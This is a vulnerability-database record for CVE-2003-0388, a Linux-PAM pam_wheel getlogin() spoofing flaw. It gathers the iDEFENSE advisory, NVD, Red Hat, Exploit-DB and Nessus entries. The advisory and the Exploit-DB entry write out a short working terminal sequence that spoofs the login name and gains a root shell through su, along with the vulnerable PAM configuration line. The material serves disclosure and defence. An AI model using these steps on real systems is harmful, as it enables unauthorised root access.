{"id": "SECURITYVULNS:DOC:4714", "bulletinFamily": "software", "title": "[Full-Disclosure] iDEFENSE Security Advisory 06.16.03: Linux-PAM getlogin() Spoofing Vulnerability", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDEFENSE Security Advisory 06.16.03:\r\nhttp://www.idefense.com/advisory/06.16.03.txt\r\nLinux-PAM getlogin() Spoofing Vulnerability\r\nJune 16, 2003\r\n\r\nI. BACKGROUND\r\n\r\nThe Pluggable Authentication Module (PAM) is a flexible mechanism for\r\nauthenticating users. More information is available at\r\nhttp://www.kernel.org/pub/linux/libs/pam/ .\r\n\r\nII. DESCRIPTION\r\n\r\nThe pam_wheel module of Andrew G. Morgan's Linux-PAM uses getlogin() in\r\nan insecure manner, thereby allowing attackers to bypass certain\r\nrestrictions. The pam_wheel module is often used with su(1) to allow\r\nusers belonging to a trusted group to utilize the command without\r\nsupplying a password. The module utilizes the getlogin() function to\r\ndetermine the name of the currently logged in user. This name is then\r\ncompared against a list of members of a trusted group as specified in\r\nthe configuration file. The following is a snippet of the offending\r\nsection of code: \r\n\r\nfromsu = getlogin();\r\nif (fromsu) {\r\n tpwd = getpwnam(fromsu);\r\n}\r\n\r\n...\r\n...\r\n...\r\n\r\n/*\r\n* test if the user is a member of the group, or if the\r\n* user has the "wheel" (sic) group as its primary group.\r\n*/\r\nif (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {\r\n if (ctrl & PAM_DENY_ARG) {\r\n retval = PAM_PERM_DENIED;\r\n } else if (ctrl & PAM_TRUST_ARG) {\r\n retval = PAM_SUCCESS; /* this can be a sufficient check\r\n*/\r\n } else {\r\n retval = PAM_IGNORE;\r\n }\r\n} else { \r\n\r\nIf the "trust" option is enabled in the pam_wheel configuration file\r\nand the "use_uid" option is disabled, any local user may spoof the\r\nusername returned by getlogin() and gain access to a super-user account\r\nwithout supplying a password. The following is a sample exploitation\r\nscenario:\r\n\r\n$ w\r\n10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00\r\nUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\r\nroot tty1 - 7:13am 3:03m 0.30s 0.22s -bash \r\nfarmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -\r\n\r\n$ logname\r\nfarmer\r\n\r\n$ ln /dev/tty tty1\r\n$ bash < tty1\r\n\r\n$ logname\r\nroot\r\n\r\n$ su -\r\n# id\r\nuid=0(root) gid=0(root)\r\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \r\n\r\nIII. ANALYSIS\r\n\r\nIf the appropriate configuration options are enabled, and a member of\r\nthe wheel group is currently logged in, any local user can spoof log\r\nentries, or, in the worst case scenario, obtain super-user privileges\r\ndepending on the PAM configuration settings.\r\n\r\nIV. DETECTION\r\n\r\nLinux-PAM 0.77 and previous versions are vulnerable, however, the\r\nnecessary configuration for exploitability must also exist. More\r\nspecifically, a trust of the wheel group must exist in an application\r\nsuch as su(1), and the use_uid option must not be enabled. This is\r\nusually not the default situation with most Linux installations.\r\n\r\nThe following is a sample default nonvulnerable entry from\r\n/etc/pam.d/su in Redhat 7.3:\r\n\r\n# Uncomment the following line to implicitly trust users in the "wheel"\r\ngroup.\r\n#auth sufficient /lib/security/pam_wheel.so trust use_uid\r\n\r\nThe following is a sample entry in /etc/pam.d/su that would be\r\nvulnerable to the described attack:\r\n\r\n# Uncomment the following line to implicitly trust users in the "wheel"\r\ngroup.\r\nauth sufficient /lib/security/pam_wheel.so trust\r\n\r\nV. WORKAORUND\r\n\r\nWhen utilizing the pam_wheel module, enable the use_uid option. Doing\r\nso should prevent the login name spoofing from circumventing PAM\r\nrestrictions.\r\n\r\nVI. VENDOR FIX\r\n\r\nAndrew Morgan does not plan to release a new version of Linux-PAM,\r\nhowever, Linux-PAM 0.78, which does fix this flaw, is obtainable via\r\nthe following CVS:\r\n\r\nhttp://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/pam/Linux-PAM/\r\n\r\nLinux distributors will be releasing their own updates as appropriate.\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project\r\nhas assigned the identification number CAN-2003-0388 to this issue.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n21 OCT 2002 Issue disclosed to iDEFENSE\r\n22 NOV 2002 Andrew Morgan (Linux-PAM maintainer) notified\r\n23 NOV 2002 Response received from Andrew Morgan\r\n25 NOV 2002 iDEFENSE clients notified\r\n14 DEC 2002 Patch provided to iDEFENSE for validation\r\n14 JAN 2003 Issue fixed in CVS\r\n09 JUN 2003 Andrew Morgan contacted re: availability of next \r\n stable release\r\n09 JUN 2003 vendor-sec@lst.de informed of CVS updates\r\n16 JUN 2003 Coordinated public disclosure\r\n\r\nX. CREDIT\r\n\r\nKarol Wiesek (appelast@bsquad.sm.pl) is credited with discovering this\r\nvulnerability.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world - from technical vulnerabilities\r\nand hacker profiling to the global spread of viruses and other\r\nmalicious code. Our security intelligence services provide\r\ndecision-makers, frontline security professionals and network\r\nadministrators with timely access to actionable intelligence and\r\ndecision support on cyber-related threats. For more information, visit\r\nhttp://www.idefense.com .\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPu3bS/rkky7kqW5PEQLIVgCfQyqAETE8GYtZy5Srg67uLsvkE/oAn0zY\r\nztyfj24MPXXfP3rBcBKnmyEB\r\n=uNkK\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "published": "2003-06-21T00:00:00", "modified": "2003-06-21T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4714", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2003-0388"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:07", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:10:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0388"]}, {"type": "osvdb", "idList": ["OSVDB:9027"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2004-304.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:31238"]}, {"type": "exploitdb", "idList": ["EDB-ID:22781"]}, {"type": "redhat", "idList": ["RHSA-2004:304"]}], "modified": "2018-08-31T11:10:07", "rev": 2}, "vulnersScore": 6.4}, "affectedSoftware": []}

{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "pam_wheel in Linux-PAM 0.78, with the trust option enabled and the use_uid option disabled, allows local users to spoof log entries and gain privileges by causing getlogin() to return a spoofed user name.", "edition": 6, "cvss3": {}, "published": "2003-07-24T04:00:00", "title": "CVE-2003-0388", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0388"], "modified": "2016-10-18T02:33:00", "cpe": ["cpe:/o:andrew_morgan:linux_pam:0.77"], "id": "CVE-2003-0388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0388", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:andrew_morgan:linux_pam:0.77:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0388"], "description": "PAM (Pluggable Authentication Modules) is a system security tool that\nallows system administrators to set an authentication policy without\nhaving to recompile programs that handle authentication.\n\nThese updates fix a potential security problem present in the\npam_wheel module. These updates correct a bug in the pam_lastlog\nmodule which prevented it from properly manipulating the /var/log/lastlog\nentry for users with very high user IDs.\n\nThe pam_wheel module is used to restrict access to a particular service\nbased on group membership. If the pam_wheel module was used with the\n\"trust\" option enabled, but without the \"use_uid\" option, any local\nuser would be able to spoof the username returned by getlogin(). The user\ncould therefore gain access to a superuser account without supplying a\npassword. In Red Hat Enterprise Linux 2.1, pam_wheel is not used by\ndefault. The Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CAN-2003-0388 to this issue.\n\nWhen manipulating the entry in /var/log/lastlog, which corresponds to a\ngiven user, the pam_lastlog module calculates the location of the entry by\nmultiplying the UID and the length of an entry in the file. On some\nsystems, the result of this calculation would mistakenly be truncated to 32\nbits for users with sufficiently high UIDs.\n\nAll users of pam should upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-03-14T19:28:03", "published": "2004-08-18T04:00:00", "id": "RHSA-2004:304", "href": "https://access.redhat.com/errata/RHSA-2004:304", "type": "redhat", "title": "(RHSA-2004:304) pam security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:01", "description": "", "published": "2003-06-17T00:00:00", "type": "packetstorm", "title": "iDEFENSE Security Advisory 2003-06-16.t", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0388"], "modified": "2003-06-17T00:00:00", "id": "PACKETSTORM:31238", "href": "https://packetstormsecurity.com/files/31238/iDEFENSE-Security-Advisory-2003-06-16.t.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \niDEFENSE Security Advisory 06.16.03: \nhttp://www.idefense.com/advisory/06.16.03.txt \nLinux-PAM getlogin() Spoofing Vulnerability \nJune 16, 2003 \n \nI. BACKGROUND \n \nThe Pluggable Authentication Module (PAM) is a flexible mechanism for \nauthenticating users. More information is available at \nhttp://www.kernel.org/pub/linux/libs/pam/ . \n \nII. DESCRIPTION \n \nThe pam_wheel module of Andrew G. Morgan's Linux-PAM uses getlogin() in \nan insecure manner, thereby allowing attackers to bypass certain \nrestrictions. The pam_wheel module is often used with su(1) to allow \nusers belonging to a trusted group to utilize the command without \nsupplying a password. The module utilizes the getlogin() function to \ndetermine the name of the currently logged in user. This name is then \ncompared against a list of members of a trusted group as specified in \nthe configuration file. The following is a snippet of the offending \nsection of code: \n \nfromsu = getlogin(); \nif (fromsu) { \ntpwd = getpwnam(fromsu); \n} \n \n... \n... \n... \n \n/* \n* test if the user is a member of the group, or if the \n* user has the \"wheel\" (sic) group as its primary group. \n*/ \nif (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) { \nif (ctrl & PAM_DENY_ARG) { \nretval = PAM_PERM_DENIED; \n} else if (ctrl & PAM_TRUST_ARG) { \nretval = PAM_SUCCESS; /* this can be a sufficient check \n*/ \n} else { \nretval = PAM_IGNORE; \n} \n} else { \n \nIf the \"trust\" option is enabled in the pam_wheel configuration file \nand the \"use_uid\" option is disabled, any local user may spoof the \nusername returned by getlogin() and gain access to a super-user account \nwithout supplying a password. The following is a sample exploitation \nscenario: \n \n$ w \n10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00 \nUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT \nroot tty1 - 7:13am 3:03m 0.30s 0.22s -bash \nfarmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? - \n \n$ logname \nfarmer \n \n$ ln /dev/tty tty1 \n$ bash < tty1 \n \n$ logname \nroot \n \n$ su - \n# id \nuid=0(root) gid=0(root) \ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n \nIII. ANALYSIS \n \nIf the appropriate configuration options are enabled, and a member of \nthe wheel group is currently logged in, any local user can spoof log \nentries, or, in the worst case scenario, obtain super-user privileges \ndepending on the PAM configuration settings. \n \nIV. DETECTION \n \nLinux-PAM 0.77 and previous versions are vulnerable, however, the \nnecessary configuration for exploitability must also exist. More \nspecifically, a trust of the wheel group must exist in an application \nsuch as su(1), and the use_uid option must not be enabled. This is \nusually not the default situation with most Linux installations. \n \nThe following is a sample default nonvulnerable entry from \n/etc/pam.d/su in Redhat 7.3: \n \n# Uncomment the following line to implicitly trust users in the \"wheel\" \ngroup. \n#auth sufficient /lib/security/pam_wheel.so trust use_uid \n \nThe following is a sample entry in /etc/pam.d/su that would be \nvulnerable to the described attack: \n \n# Uncomment the following line to implicitly trust users in the \"wheel\" \ngroup. \nauth sufficient /lib/security/pam_wheel.so trust \n \nV. WORKAORUND \n \nWhen utilizing the pam_wheel module, enable the use_uid option. Doing \nso should prevent the login name spoofing from circumventing PAM \nrestrictions. \n \nVI. VENDOR FIX \n \nAndrew Morgan does not plan to release a new version of Linux-PAM, \nhowever, Linux-PAM 0.78, which does fix this flaw, is obtainable via \nthe following CVS: \n \nhttp://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/pam/Linux-PAM/ \n \nLinux distributors will be releasing their own updates as appropriate. \n \nVII. CVE INFORMATION \n \nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project \nhas assigned the identification number CAN-2003-0388 to this issue. \n \nVIII. DISCLOSURE TIMELINE \n \n21 OCT 2002 Issue disclosed to iDEFENSE \n22 NOV 2002 Andrew Morgan (Linux-PAM maintainer) notified \n23 NOV 2002 Response received from Andrew Morgan \n25 NOV 2002 iDEFENSE clients notified \n14 DEC 2002 Patch provided to iDEFENSE for validation \n14 JAN 2003 Issue fixed in CVS \n09 JUN 2003 Andrew Morgan contacted re: availability of next \nstable release \n09 JUN 2003 vendor-sec@lst.de informed of CVS updates \n16 JUN 2003 Coordinated public disclosure \n \nX. CREDIT \n \nKarol Wiesek (appelast@bsquad.sm.pl) is credited with discovering this \nvulnerability. \n \n \nGet paid for security research \nhttp://www.idefense.com/contributor.html \n \nSubscribe to iDEFENSE Advisories: \nsend email to listserv@idefense.com, subject line: \"subscribe\" \n \n \nAbout iDEFENSE: \n \niDEFENSE is a global security intelligence company that proactively \nmonitors sources throughout the world - from technical vulnerabilities \nand hacker profiling to the global spread of viruses and other \nmalicious code. Our security intelligence services provide \ndecision-makers, frontline security professionals and network \nadministrators with timely access to actionable intelligence and \ndecision support on cyber-related threats. For more information, visit \nhttp://www.idefense.com . \n \n-----BEGIN PGP SIGNATURE----- \nVersion: PGP 8.0 \n \niQA/AwUBPu3bS/rkky7kqW5PEQLIVgCfQyqAETE8GYtZy5Srg67uLsvkE/oAn0zY \nztyfj24MPXXfP3rBcBKnmyEB \n=uNkK \n-----END PGP SIGNATURE----- \n \nTo stop receiving iDEFENSE Security Advisories, reply to this message and put \"unsubscribe\" in the subject. \n`\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/31238/06.16.03.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2003-0388"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:9057](https://secuniaresearch.flexerasoftware.com/advisories/9057/)\n[Secunia Advisory ID:12330](https://secuniaresearch.flexerasoftware.com/advisories/12330/)\nRedHat RHSA: RHSA-2004:304\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=9&type=vulnerabilities\n[CVE-2003-0388](https://vulners.com/cve/CVE-2003-0388)\n", "modified": "2003-06-16T00:00:00", "published": "2003-06-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:9027", "id": "OSVDB:9027", "title": "PAM getlogin Privilege Escalation", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:31:23", "description": "Linux-PAM 0.77 Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability. CVE-2003-0388. Local exploit for linux platform", "published": "2003-06-16T00:00:00", "type": "exploitdb", "title": "Linux-PAM 0.77 - Pam_Wheel Module getlogin Username Spoofing Privileged Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0388"], "modified": "2003-06-16T00:00:00", "id": "EDB-ID:22781", "href": "https://www.exploit-db.com/exploits/22781/", "sourceData": "source: http://www.securityfocus.com/bid/7929/info\r\n\r\nA vulnerability has been discovered in the Linux-Pam pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials and is not configured to verify the user's UID, it may be possible for a local attacker to elevated privileges.\r\n\r\nThis can be accomplished by spoofing the users login named, returned by the getlogin() function, to that of a logged in user of the wheel group.\r\n\r\nSuccessful exploitation of this condition could ultimately result in an attacker gaining local root access on the target system. \r\n\r\n$ w\r\n10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00\r\nUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\r\nroot tty1 - 7:13am 3:03m 0.30s 0.22s -bash\r\nfarmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -\r\n\r\n$ logname\r\nfarmer\r\n\r\n$ ln /dev/tty tty1\r\n$ bash < tty1\r\n\r\n$ logname\r\nroot\r\n\r\n$ su -\r\n# id\r\nuid=0(root) gid=0(root)\r\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22781/"}], "nessus": [{"lastseen": "2021-01-17T13:05:19", "description": "Updated pam packages that fix a security vulnerability are now\navailable for Red Hat Enterprise Linux 2.1.\n\nPAM (Pluggable Authentication Modules) is a system security tool that\nallows system administrators to set an authentication policy without\nhaving to recompile programs that handle authentication.\n\nThese updates fix a potential security problem present in the\npam_wheel module. These updates correct a bug in the pam_lastlog\nmodule which prevented it from properly manipulating the\n/var/log/lastlog entry for users with very high user IDs.\n\nThe pam_wheel module is used to restrict access to a particular\nservice based on group membership. If the pam_wheel module was used\nwith the 'trust' option enabled, but without the 'use_uid' option, any\nlocal user would be able to spoof the username returned by getlogin().\nThe user could therefore gain access to a superuser account without\nsupplying a password. In Red Hat Enterprise Linux 2.1, pam_wheel is\nnot used by default. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0388 to this issue.\n\nWhen manipulating the entry in /var/log/lastlog, which corresponds to\na given user, the pam_lastlog module calculates the location of the\nentry by multiplying the UID and the length of an entry in the file.\nOn some systems, the result of this calculation would mistakenly be\ntruncated to 32 bits for users with sufficiently high UIDs.\n\nAll users of pam should upgrade to these updated packages, which\nresolve these issues.", "edition": 28, "published": "2004-08-18T00:00:00", "title": "RHEL 2.1 : pam (RHSA-2004:304)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0388"], "modified": "2004-08-18T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:pam-devel", "p-cpe:/a:redhat:enterprise_linux:pam"], "id": "REDHAT-RHSA-2004-304.NASL", "href": "https://www.tenable.com/plugins/nessus/14310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:304. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14310);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0388\");\n script_xref(name:\"RHSA\", value:\"2004:304\");\n\n script_name(english:\"RHEL 2.1 : pam (RHSA-2004:304)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pam packages that fix a security vulnerability are now\navailable for Red Hat Enterprise Linux 2.1.\n\nPAM (Pluggable Authentication Modules) is a system security tool that\nallows system administrators to set an authentication policy without\nhaving to recompile programs that handle authentication.\n\nThese updates fix a potential security problem present in the\npam_wheel module. These updates correct a bug in the pam_lastlog\nmodule which prevented it from properly manipulating the\n/var/log/lastlog entry for users with very high user IDs.\n\nThe pam_wheel module is used to restrict access to a particular\nservice based on group membership. If the pam_wheel module was used\nwith the 'trust' option enabled, but without the 'use_uid' option, any\nlocal user would be able to spoof the username returned by getlogin().\nThe user could therefore gain access to a superuser account without\nsupplying a password. In Red Hat Enterprise Linux 2.1, pam_wheel is\nnot used by default. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0388 to this issue.\n\nWhen manipulating the entry in /var/log/lastlog, which corresponds to\na given user, the pam_lastlog module calculates the location of the\nentry by multiplying the UID and the length of an entry in the file.\nOn some systems, the result of this calculation would mistakenly be\ntruncated to 32 bits for users with sufficiently high UIDs.\n\nAll users of pam should upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:304\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pam and / or pam-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:304\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"pam-0.75-46.9\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"pam-devel-0.75-46.9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pam / pam-devel\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}]}